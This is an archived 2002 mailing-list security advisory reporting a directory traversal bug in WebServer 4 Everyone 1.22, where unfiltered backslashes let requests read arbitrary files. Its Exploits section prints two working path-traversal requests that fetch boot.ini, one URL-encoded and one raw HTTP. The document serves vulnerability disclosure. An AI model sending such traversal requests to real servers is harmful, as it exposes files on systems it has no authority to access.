advisory

From: UkR security team™ (cuctemaat_private)
Date: Thu Sep 05 2002 - 05:30:30 PDT

Next message: Thor Larholm: "RE: (Fwd) MSIEv6 % encoding causes a problem again"

Previous message: Scott Walker Register: "RE: SecuRemote usernames can be guessed or sniffed using IKE exchange"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  -----------  UkR security team advisory  ------------
      WebServer 4 Everyone directory traversal bug
  -----------------------------------------------------

Name:      WebServer 4 Everyone directory traversal bug
Date:                                        28.08.2002
Author:   UkR-XblP/ UkR security team/ http://ust.dp.ua
Application:         WebServer 4 Everyone Version: 1.22 
URL:                            http://www.freeware.lt/
Risk: An attacker can view every file in the remote sys
About:   WebServer 4 Everyone is a commercial webserver
                             that runs on Win32 systems.
Bug:  problem is caused by the character '\' (%5c) that
       is not checked as bad character, so the server 
       follow the path in the URI that the attacker give
       until it reach the file requested.
Exploits: 
      http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
               or GET /\..\..\..\..\..\boot.ini HTTP/1.0
      This last is an HTTP request that can be sent with
telnet because some browsers can modify the "\.." chars.

Greetz:     2 Nadya Ostafiychuk - happy birthday !!! ;)
---
Professional hosting for everyone - http://www.host.ru

Next message: Thor Larholm: "RE: (Fwd) MSIEv6 % encoding causes a problem again"
Previous message: Scott Walker Register: "RE: SecuRemote usernames can be guessed or sniffed using IKE exchange"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Sep 05 2002 - 14:29:33 PDT